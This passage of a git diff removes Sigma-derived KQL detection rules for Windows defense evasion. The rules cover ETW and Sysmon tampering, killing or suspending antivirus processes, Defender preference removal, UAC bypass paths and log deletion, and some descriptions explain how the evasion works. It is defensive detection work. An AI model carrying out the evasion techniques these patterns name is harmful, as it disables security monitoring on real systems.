ProcessCommandLine contains "Remove-Service ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) or ((ProcessCommandLine contains " stop " or ProcessCommandLine contains " delete " or ProcessCommandLine contains " pause ") and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql b/Defense Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql
deleted file mode 100644
index 3a8d740e..00000000
--- a/Defense Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/02/11
-// Level: high
-// Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions
-// Tags: attack.defense_evasion, attack.t1562.001, attack.t1070.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "stop " or ProcessCommandLine contains "delete ") and (FolderPath endswith "\\logman.exe" or ProcessVersionInfoOriginalFileName =~ "Logman.exe") and (ProcessCommandLine contains "Circular Kernel Context Logger" or ProcessCommandLine contains "EventLog-" or ProcessCommandLine contains "SYSMON TRACE" or ProcessCommandLine contains "SysmonDnsEtwSession")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql b/Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql
deleted file mode 100644
index 1d0f27c0..00000000
--- a/Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/26
-// Level: high
-// Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "Wuauclt" or ProcessCommandLine endswith "Wuauclt.exe") and (FolderPath endswith "\\Wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "Wuauclt.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql b/Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql
deleted file mode 100644
index dbebbd92..00000000
--- a/Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects suspicious and uncommon child processes of WmiPrvSE
-// Tags: attack.execution, attack.defense_evasion, attack.t1047, attack.t1204.002, attack.t1218.010
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql b/Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql
deleted file mode 100644
index 68be0887..00000000
--- a/Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/06/04
-// Level: medium
-// Description: Detects a suspicious call to the user32.dll function that locks the user workstation
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "user32.dll," and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\cmd.exe" and ProcessCommandLine contains "LockWorkStation"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql b/Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql
deleted file mode 100644
index 508c2628..00000000
--- a/Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/23
-// Level: medium
-// Description: Detect use of X509Enrollment
-// Tags: attack.defense_evasion, attack.t1553.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "X509Enrollment.CBinaryConverter" or ProcessCommandLine contains "884e2002-217d-11da-b2a4-000e7bbb2b09"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql b/Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql
deleted file mode 100644
index f68123c0..00000000
--- a/Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali
-// Date: 2018/09/05
-// Level: medium
-// Description: Detects presence of a potentially xor encoded powershell command
-// Tags: attack.defense_evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_ZipExec_Execution.kql b/Defense Evasion/Suspicious_ZipExec_Execution.kql
deleted file mode 100644
index 59378b3b..00000000
--- a/Defense Evasion/Suspicious_ZipExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/07
-// Level: medium
-// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip")
\ No newline at end of file
diff --git a/Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql b/Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql
deleted file mode 100644
index b49c1f51..00000000
--- a/Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/12
-// Level: medium
-// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "\"n; " and (FolderPath endswith "\\SyncAppvPublishingServer.exe" or ProcessVersionInfoOriginalFileName =~ "syncappvpublishingserver.exe")
\ No newline at end of file
diff --git a/Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql b/Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql
deleted file mode 100644
index 2b772b2e..00000000
--- a/Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/16
-// Level: medium
-// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
-// Tags: attack.defense_evasion, attack.t1218, attack.t1216
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\SyncAppvPublishingServer.vbs" and ProcessCommandLine contains ";"
\ No newline at end of file
diff --git a/Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql b/Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql
deleted file mode 100644
index 25f9908e..00000000
--- a/Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/23
-// Level: high
-// Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "msmpeng.exe" and (ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Sysmon_Configuration_Update.kql b/Defense Evasion/Sysmon_Configuration_Update.kql
deleted file mode 100644
index 1666200e..00000000
--- a/Defense Evasion/Sysmon_Configuration_Update.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/09
-// Level: medium
-// Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "/c") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor")
\ No newline at end of file
diff --git a/Defense Evasion/Sysmon_Driver_Altitude_Change.kql b/Defense Evasion/Sysmon_Driver_Altitude_Change.kql
deleted file mode 100644
index 545223e7..00000000
--- a/Defense Evasion/Sysmon_Driver_Altitude_Change.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: B.Talebi
-// Date: 2022/07/28
-// Level: high
-// Description: Detects changes in Sysmon driver altitude value.
-If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
-
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Services" and RegistryKey endswith "\\Instances\\Sysmon Instance\\Altitude"
\ No newline at end of file
diff --git a/Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql b/Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql
deleted file mode 100644
index cd96d782..00000000
--- a/Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kirill Kiryanov, oscd.community
-// Date: 2019/10/23
-// Level: high
-// Description: Detects possible Sysmon filter driver unloaded via fltmc.exe
-// Tags: attack.defense_evasion, attack.t1070, attack.t1562, attack.t1562.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "unload" and ProcessCommandLine contains "sysmon") and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")
\ No newline at end of file
diff --git a/Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql b/Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql
deleted file mode 100644
index 9eaee852..00000000
--- a/Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Anish Bogati
-// Date: 2024/01/09
-// Level: medium
-// Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.
-// Tags: attack.defense_evasion, attack.t1036
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\hdwwiz.cpl" or FolderPath endswith "\\appwiz.cpl") and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/System_File_Execution_Location_Anomaly.kql b/Defense Evasion/System_File_Execution_Location_Anomaly.kql
deleted file mode 100644
index b5d45fc6..00000000
--- a/Defense Evasion/System_File_Execution_Location_Anomaly.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali
-// Date: 2017/11/27
-// Level: high
-// Description: Detects a Windows program executable started from a suspicious folder
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith 
"\\winver.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\wsmprovhost.exe" or FolderPath endswith "\\dfrgui.exe") and (not((((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or FolderPath contains "\\SystemRoot\\System32\\" or (FolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe"))) or (FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux"))))
\ No newline at end of file
diff --git a/Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql b/Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql
deleted file mode 100644
index a84c588e..00000000
--- a/Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Remove-MpPreference" and (ProcessCommandLine contains "-ControlledFolderAccessProtectedFolders " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Ids " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Actions " or ProcessCommandLine contains "-CheckForSignaturesBeforeRunningScan ")
\ No newline at end of file
diff --git a/Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql b/Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql
deleted file mode 100644
index fcdeaa30..00000000
--- a/Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/02
-// Level: high
-// Description: Detects tamper attempts to sophos av functionality via registry key modification
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SAVEnabled" or RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SEDEnabled" or RegistryKey contains "\\Sophos\\SAVService\\TamperProtection\\Enabled")
\ No newline at end of file
diff --git a/Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql b/Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql
deleted file mode 100644
index f8e74343..00000000
--- a/Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Ilya Krestinichev, Florian Roth (Nextron Systems)
-// Date: 2022/09/13
-// Level: high
-// Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection.
-Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.
-As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
-
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "taskkill" and ProcessCommandLine contains " /F " and ProcessCommandLine contains " /IM " and ProcessCommandLine contains "ccSvcHst.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql b/Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql
deleted file mode 100644
index 1c869660..00000000
--- a/Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/03/18
-// Level: high
-// Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where FolderPath endswith "\\taskmgr.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/Defense Evasion/Tasks_Folder_Evasion.kql b/Defense Evasion/Tasks_Folder_Evasion.kql
deleted file mode 100644
index 057c6541..00000000
--- a/Defense Evasion/Tasks_Folder_Evasion.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman
-// Date: 2020/01/13
-// Level: high
-// Description: The Tasks folder in system32 and syswow64 are globally writable paths.
-Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
-in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
-
-// Tags: attack.defense_evasion, attack.persistence, attack.execution, attack.t1574.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\")
\ No newline at end of file
diff --git a/Defense Evasion/TeamViewer_Log_File_Deleted.kql b/Defense Evasion/TeamViewer_Log_File_Deleted.kql
deleted file mode 100644
index c78998d5..00000000
--- a/Defense Evasion/TeamViewer_Log_File_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: low
-// Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceFileEvents
-| where (FolderPath contains "\\TeamViewer_" and FolderPath endswith ".log") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql b/Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql
deleted file mode 100644
index 29fb1e22..00000000
--- a/Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/10/19
-// Level: high
-// Description: Detects the deletion of registry keys containing the MSTSC connection history
-// Tags: attack.defense_evasion, attack.t1070, attack.t1112
-DeviceRegistryEvents
-| where (ActionType =~ "DeleteValue" and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Default\\MRU") or ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Servers")
\ No newline at end of file
diff --git a/Defense Evasion/Third_Party_Software_DLL_Sideloading.kql b/Defense Evasion/Third_Party_Software_DLL_Sideloading.kql
deleted file mode 100644
index 15cbb1e6..00000000
--- a/Defense Evasion/Third_Party_Software_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql b/Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql
deleted file mode 100644
index 676604a5..00000000
--- a/Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\tttracer.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql b/Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql
deleted file mode 100644
index 856e72cb..00000000
--- a/Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll"
\ No newline at end of file
diff --git a/Defense Evasion/Tomcat_WebServer_Logs_Deleted.kql b/Defense Evasion/Tomcat_WebServer_Logs_Deleted.kql
deleted file mode 100644
index 7d6b9bce..00000000
--- a/Defense Evasion/Tomcat_WebServer_Logs_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/16
-// Level: medium
-// Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070
-DeviceFileEvents
-| where (FolderPath contains "catalina." or FolderPath contains "_access_log." or FolderPath contains "localhost.") and (FolderPath contains "\\Tomcat" and FolderPath contains "\\logs\\")
\ No newline at end of file
diff --git a/Defense Evasion/Trust_Access_Disable_For_VBApplications.kql b/Defense Evasion/Trust_Access_Disable_For_VBApplications.kql
deleted file mode 100644
index 5c5f14c7..00000000
--- a/Defense Evasion/Trust_Access_Disable_For_VBApplications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/05/22
-// Level: high
-// Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\AccessVBOM"
\ No newline at end of file
diff --git a/Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql b/Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql
deleted file mode 100644
index b8536a1a..00000000
--- a/Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/27
-// Level: critical
-// Description: Detects indicators of a UAC bypass method by mocking directories
-// Tags: attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath contains "C:\\Windows \\System32\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql b/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql
deleted file mode 100644
index 8d57f867..00000000
--- a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql b/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql
deleted file mode 100644
index 503d8c5f..00000000
--- a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql b/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql
deleted file mode 100644
index 979b06ac..00000000
--- a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains "\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql b/Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql
deleted file mode 100644
index ba29c60d..00000000
--- a/Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/31
-// Level: high
-// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
